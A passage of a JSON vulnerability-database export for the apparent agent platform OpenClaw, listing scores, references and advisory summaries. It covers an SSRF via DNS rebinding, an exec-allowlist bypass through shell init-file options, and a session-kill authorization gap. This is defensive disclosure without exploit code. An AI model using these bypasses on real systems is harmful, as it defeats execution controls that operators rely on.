:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/64367"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xq94-r468-qwgj","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:43Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xq94-r468-qwgj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43582","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43582"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-dns-rebinding-ssrf-via-hostname-validation-bypass","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:43Z/"
}],"url":"https://www.vulncheck.com/advisories/openclaw-dns-rebinding-ssrf-via-hostname-validation-bypass"},{"reference_url":"https://github.com/advisories/GHSA-xq94-r468-qwgj","reference_id":"GHSA-xq94-r468-qwgj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xq94-r468-qwgj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{
"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["CVE-2026-43582","GHSA-xq94-r468-qwgj"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7snr-fn3u-x3b8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89612?format=json","vulnerability_id":"VCID-7wmr-v7zb-6fc9","summary":"OpenClaw: Shell init-file options could satisfy exec allowlist script matching\n## Summary\n\nBefore OpenClaw 2026.3.31, exec allowlist matching could treat shell init-file wrapper invocations as if the approved script itself were being executed. Shell options such as `--rcfile`, `--init-file`, and `--startup-file` could therefore inherit allowlist trust from a matched script path even though the shell loaded attacker-chosen initialization first.\n\n## Impact\n\nThis issue only applied when exec allowlist or allow-always behavior was enabled and the attacker could steer a shell-wrapper command shape that used init-file options. The result was a narrower allowlist bypass, not generic arbitrary command execution from an untrusted boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.3.31`\n- Patched versions: `>= 2026.3.31`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `0c8375424620e12777ef24c162eedc7e9fcfd7e3` — reject shell init-file script matches\n\n## Release Process Note\n\nThe fix shipped in OpenClaw `2026.3.31` on March 31, 2026. 
The current published npm release `2026.4.1` from April 1, 2026 also contains the fix.\n\nThanks @cyjhhh for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41392","reference_id":"","reference_type":"","scores":[{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.07055","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.07045","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.0706","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41392"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/0c8375424620e12777ef24c162eedc7e9fcfd7e3","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:18:08Z/"}],"url":"https://github.com/openclaw/openclaw/commit/0c8375
424620e12777ef24c162eedc7e9fcfd7e3"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wpc6-37g7-8q4w","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:18:08Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wpc6-37g7-8q4w"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41392","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41392"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-exec-allowlist-bypass-via-shell-init-file-options","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/
SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:18:08Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-exec-allowlist-bypass-via-shell-init-file-options"},{"reference_url":"https://github.com/advisories/GHSA-wpc6-37g7-8q4w","reference_id":"GHSA-wpc6-37g7-8q4w","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wpc6-37g7-8q4w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4j
z-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2t
j-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41392","GHSA-wpc6-37g7-8q4w"],"risk_score":3.3,"exploitability":"0.5","weighted_severity":"6.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7wmr-v7zb-6fc9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89592?format=json","vulnerability_id":"VCID-7z2s-k6ty-ekg1","summary":"OpenClaw: Read-scoped identity-bearing HTTP clients could kill sessions via /sessions/:sessionKey/kill\n## Summary\n\nBefore OpenClaw 2026.4.2, `POST /sessions/:sessionKey/kill` did not enforce write scopes in identity-bearing HTTP modes. A caller limited to read-only operator scopes could still terminate a running subagent session.\n\n## Impact\n\nA read-scoped caller could perform a write-class control-plane mutation and interrupt delegated work. 
This was an authorization bug on the HTTP scope boundary, not a shared-secret compatibility exception.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `54a0878517167c6e49900498cf77420dadb74beb` — enforce session-kill HTTP scopes\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @EaEa0001 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41298","reference_id":"","reference_type":"","scores":[{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10395","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10436","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10417","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41298"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/54a0878517167c6e49900498cf77420dadb74beb","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_syst
em":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T17:34:13Z/"}],"url":"https://github.com/openclaw/openclaw/commit/54a0878517167c6e49900498cf77420dadb74beb"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5hff-46vh-rxmw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T17:34:13Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5hff-46vh-rxmw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41298","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41298"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-session-termination-endpoint","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/
UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T17:34:13Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-session-termination-endpoint"},{"reference_url":"https://github.com/advisories/GHSA-5hff-46vh-rxmw","reference_id":"GHSA-5hff-46vh-rxmw","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5hff-46vh-rxmw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vuln
erability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vuln
erability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["CVE-2026-41298","GHSA-5hff-46vh-rxmw"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7z2s-k6ty-ekg1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91092?format=json","vulnerability_id":"VCID-816s-45wb-83ce","summary":"OpenClaw: Remote media error responses could trigger unbounded memory allocation before failure\n## Summary\nRemote media HTTP error bodies were read without a hard size cap before failure handling, allowing unbounded allocation on error responses.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `81445a901091a5d27ef0b56fceedbe4724566438`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/media/fetch.ts now routes non-2xx failures through bounded prefix reads instead of buffering the whole error body.\n- src/media/read-response-with-limit.ts enforces capped reads and truncates 